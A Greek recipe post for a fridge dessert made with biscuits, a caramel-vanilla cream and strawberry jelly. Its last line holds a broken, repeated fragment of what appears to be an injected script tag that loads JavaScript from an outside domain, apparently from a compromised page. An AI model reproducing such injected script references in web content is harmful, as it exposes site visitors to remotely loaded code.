Γλυκό ψυγείου με ζελέ -κρέμα καραμέλα & μπισκότα !!!

13466501_512803475587045_4105337402259146418_n

Από τα πιο δροσερά μαμαδίστικα γλυκάκια ψυγείου !!!

ΥΛΙΚΑ:

Για την κρέμα:
1100ml νερό
750ml γάλα εβαπορέ
1 κουτί άνθος αραβοσίτου Γιωτης γεύση βανίλια 160γρ.(όχι στιγμής)
15 κοφτές κουταλιές τής σούπας ζάχαρη
100γρ σιρόπι καραμέλας
Για το ζελέ:
1 συσκευασία περιεχόμενο των 2 φακέλων ζελέ φράουλα
350ml ζεστό νερό
350ml κρύο νερό
1 πακέτο μπισκότα πτι μπερ
ΤΡΟΠΟΣ ΠΑΡΑΣΚΕΥΗΣ:
Σπάμε τα μπισκότα και τα απλώνουμε στο πυρέξ.Σε ένα μπολ ρίχνουμε το χλιαρό νερό και αδειάζουμε τούς φακέλλους ζελέ φράουλα.Ανακατεύουμε και ρίχνουμε και το κρύο νερό.Ανακατεύουμε καλά και βάζουμε ψυγείο το μπολ να ξεκινά να πήζει ελάχιστα το ζελέ!
Σε μία κατσαρόλα ζεσταίνουμε το νερό με το γάλα, ρίχνουμε την ζάχαρη και μόλις ξεκινά να ζεσταίνετε διαλύεται το άνθος αραβοσίτου σε λίγο γάλα(μία φλυτζάνα τσαγιού) και το προσθέτουμε στην κατσαρόλα ανακατεύοντας συνεχώς μέχρι να πήξει σε χαμηλή φωτιά.Ρίχνουμε το σιρόπι καραμέλα και ανακατεύουμε ελαφρά.Αδειάζουμε την κρέμα στο ταψί με τα μπισκότα και τα ανακατεύουμε ελαφρά με ένα κουτάλι να μπερδευτούν μπισκότα και κρέμα! Βάζουμε ψυγείο να πήξει και τέλος ρίχνουμε το ζελέ πού ξεκινά να πήζει ελαφρώς και αφήνουμε ψυγείο για περίπου 3-4 ώρες.
Καλή σάς επιτυχία!

___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>